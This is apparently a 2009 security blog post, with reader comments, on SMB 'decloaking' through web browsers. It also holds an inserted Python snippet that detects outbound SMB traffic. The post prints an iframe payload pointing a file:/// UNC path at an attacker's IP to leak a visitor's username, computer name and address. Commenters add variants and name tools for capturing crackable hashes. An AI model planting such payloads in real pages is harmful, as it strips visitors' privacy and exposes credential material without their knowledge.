SMB Decloaking
Still in line with the DefCon preso, next on the list of things I need to talk about is SMB. Yeah, I already talked about SMBenum, but that’s different - that is about knowing what you’ve got on your drive. SMB itself is a way for two computers to talk to one another. The simplest example of triggering it from a web page is an iframe. Of course you need to have SMB running on both sides and they need to be able to communicate together for this to work. But the nice thing is if you’ve got Wireshark running you can get the real username, IP address, computer name, service pack and possibly other interesting tidbits.
<iframe src="file:///\\123.123.123.123/"></iframe>
Of course for this to work several things have to be true. One, the above IP address needs to be modified to be the attacker’s computer. Two, the attacker needs to be running SMB services to listen and get the information. Three, the company where the victim is connecting from must allow outbound SMB - which I’m told is only about 50%. So 50% of people running 60% of browsers (an IE variant) will be vulnerable to this. Still not terrible, and it isn’t particularly noisy either and requires no user interaction, which is nice.
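The third condition above (outbound SMB being allowed) is the one a defender controls. As an added example that is not part of the original post, here is detection logic that flags workstation connections to SMB ports outside the organisation; the key=value log format, the internal ranges and the sample lines are all constructed assumptions.

```python
# Added example (not from the original post). Detection logic for the egress
# condition the post describes: a workstation opening SMB (TCP 139/445) to an
# address outside the organisation. Log format and addresses are constructed.
import ipaddress
import re

SMB_PORTS = {139, 445}
# Internal ranges are an assumption; replace with the organisation's own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
LOG_RE = re.compile(
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)")

def is_external(addr):
    """True if addr falls outside every internal range (constructed policy)."""
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)

def parse_line(line):
    """Parse one key=value firewall line; return None for lines we cannot read."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    return {"src": m["src"], "dst": m["dst"],
            "dport": int(m["dport"]), "proto": m["proto"].lower()}

def find_smb_egress(lines):
    """Return (src, dst, dport) for each TCP connection to an external SMB port."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue
        if rec["dport"] in SMB_PORTS and is_external(rec["dst"]):
            hits.append((rec["src"], rec["dst"], rec["dport"]))
    return hits

# Constructed sample log: line 1 matches the post's iframe target, line 2 is
# normal internal file sharing, line 3 is HTTPS, line 4 is another SMB egress.
SAMPLE_LOG = [
    "2009-08-12T02:16:00Z src=10.0.0.25 dst=123.123.123.123 dport=445 proto=tcp",
    "2009-08-12T02:16:01Z src=10.0.0.25 dst=10.0.0.5 dport=445 proto=tcp",
    "2009-08-12T02:16:02Z src=10.0.0.25 dst=203.0.113.7 dport=443 proto=tcp",
    "2009-08-12T02:16:03Z src=10.0.0.40 dst=198.51.100.9 dport=139 proto=tcp",
]

if __name__ == "__main__":
    for src, dst, port in find_smb_egress(SAMPLE_LOG):
        print(f"SMB egress: {src} -> {dst}:{port}")
```

Any hit here means a host inside the network tried to talk SMB to the outside, which is exactly the path the iframe relies on; blocking 139/445 at the egress firewall closes it regardless of browser.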



August 12th, 2009 at 2:16 am
Hi, the same SMB issues can also be exploited using Windows Media Player embedded in a web page. Used against a victim in an intranet environment it can lead the attacker to make a scan of the hosts reachable from the victim with an exact identification of hostname, domain, OS, cpu model, etc.
I posted about this topic on my blog a couple of months ago.
August 12th, 2009 at 10:15 pm
Dude, what kind of a noob are you? This stuff has been talked about for years. See e.g. http://blog.metasploit.com/2008_11_01_archive.html; http://www.xfocus.net/articles/200305/smbrelay.html. You make it sound like you just discovered this. At least give credit where it’s due.
August 13th, 2009 at 6:29 pm
tried to locate that rosario and could not, could you hit me with the link please?
on topic
Good Post - Q. any ie ? Q. how particularly NOT noisy?
thx
August 13th, 2009 at 7:26 pm
@Sir Duke - I think you mis-read my post. This isn’t about authentication tokens/NTLM challenge responses or anything like that. This is about the fact that it discloses the username and computer name in an _unauthenticated_ state. Nothing to do with passwords.
And no, I probably didn’t invent it. Seems like anything anyone says has some foundation in other people’s research. No need to be hostile.
August 13th, 2009 at 7:28 pm
@sencaw - yeah all versions of IE appear to work. It’s not noisy in the sense where there’s no popups or anything to alert the user. From a network perspective it’s very noisy, but not that many people are watching the wire during typical web surfing activities.
August 14th, 2009 at 1:03 pm
@sencaw the link is http://sites.google.com/site/tentacoloviola
August 16th, 2009 at 12:27 am
You didn’t by chance grab this from deanonymizer.com’s IE 0-day scan that launched during BlackHat and Defcon this year, did you?
Let me explain this a bit more about this.
When IE uses this FILE URI and points to a directory/share using SMB, it looks for the desktop.ini file too. Using the correct variables in the path to set the folder’s icon, an attacker can reveal the %USERNAME%, %COMPUTERNAME%, %DOMAINNAME% (or Workgroup), and the real IP address of the user *IF* they are using a shitty proxy.
Now what makes this even more interesting is the history of SMB. Besides revealing information, SMB has been prone to several vulnerabilities in the past. WebDAV, BTW, is used when SMB can’t make it outside the network for _X_ reason. If you look hard enough, you’ll find remote code execution in WebDAV. It’s already been found, but Windows 7 has fixed the issue so it’s a dying vuln.
Go ahead and take a closer look at WebDAV, but just remember where you got your info from. Some people don’t take it lightly when credit isn’t given when it’s due. Take Kaminsky, for example, who tried taking the part of spotlight of Moxie’s SSL work…and he ended up in the zf05. Something to think about….
August 17th, 2009 at 9:50 am
may as well pwn them if you are going to inject img src=\\UNC ..
http://forums.remote-exploit.org/showthread.php?t=12885
August 19th, 2009 at 9:26 am
@Bob - cool, no I hadn’t heard about the deanonymizer project. I actually first started talking about this at Blackhat, incidentally (maybe even on the same day)? Small world. But yeah, I wasn’t thinking about using it to scan, just to passively listen to the wire. I’m sure you’re right and there is a lot of other stuff out there to be found.
Which SSL work did Kaminsky steal? I didn’t make his presentation this year, and haven’t gotten the DVDs for the conference, so I haven’t seen it. I just heard something about MD2 being used….?
@opreat0r - true, my speech with Jabra was just about decloaking. I leave the actual exploitation to the MetaSploit browser auto-pwn guys. They live and breathe that kind of thing. Our speech was just about anti-privacy.
October 23rd, 2009 at 9:06 am
You can use metasploit’s smb_sniffer module to log all of these requests. You also get a crackable password hash.